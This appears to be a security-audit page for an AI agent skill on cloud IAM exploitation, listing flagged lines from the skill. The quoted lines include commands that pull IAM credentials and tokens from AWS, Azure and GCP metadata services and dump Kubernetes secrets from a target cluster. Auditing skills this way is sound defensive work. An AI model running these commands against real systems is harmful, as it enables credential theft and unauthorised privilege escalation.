cloud-iam-deep
Analyzes cloud IAM vulnerabilities across AWS, Azure, and GCP, focusing on external exploitation and privilege escalation techniques.
Install this skill
Security score
The cloud-iam-deep skill was audited on May 29, 2026 and we found 25 security issues across 3 threat categories. Review the findings below before installing.
Categories Tested
Security Issues
Curl to non-GitHub URL
| 158 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ |
Curl to non-GitHub URL
| 161 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> |
Curl to non-GitHub URL
| 165 | curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" |
Curl to non-GitHub URL
| 167 | curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/ |
Curl to non-GitHub URL
| 213 | curl -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions?api-version=2020-01-01" |
Curl to non-GitHub URL
| 308 | curl -sk "https://k8s.target.com:6443/api/v1/namespaces" |
Curl to non-GitHub URL
| 311 | curl -sk "https://k8s.target.com:6443/api/v1/pods?limit=1" |
Access to .env file
| 409 | - **`hunt-cloud-misconfig`** — Public buckets and exposed configs are the most common credential-leak vector. Chain primitive: Cloud misconfig (`.env` in public S3) + leaked AWS access key → IAM enume |
External URL reference
| 158 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ |
External URL reference
| 161 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> |
External URL reference
| 165 | curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" |
External URL reference
| 167 | curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/ |
External URL reference
| 207 | # Endpoint: http://169.254.169.254/metadata/identity/oauth2/token |
External URL reference
| 209 | "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" |
External URL reference
| 213 | curl -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions?api-version=2020-01-01" |
External URL reference
| 217 | "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" |
External URL reference
| 221 | "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" |
External URL reference
| 294 | "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" |
External URL reference
| 299 | "https://cloudresourcemanager.googleapis.com/v1/projects" |
External URL reference
| 308 | curl -sk "https://k8s.target.com:6443/api/v1/namespaces" |
External URL reference
| 311 | curl -sk "https://k8s.target.com:6443/api/v1/pods?limit=1" |
External URL reference
| 315 | kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get namespaces |
External URL reference
| 316 | kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify auth can-i --list |
External URL reference
| 317 | kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get pods -A |
External URL reference
| 318 | kubectl --token=$TOKEN --server=https://k8s.target.com:6443 --insecure-skip-tls-verify get secrets -A |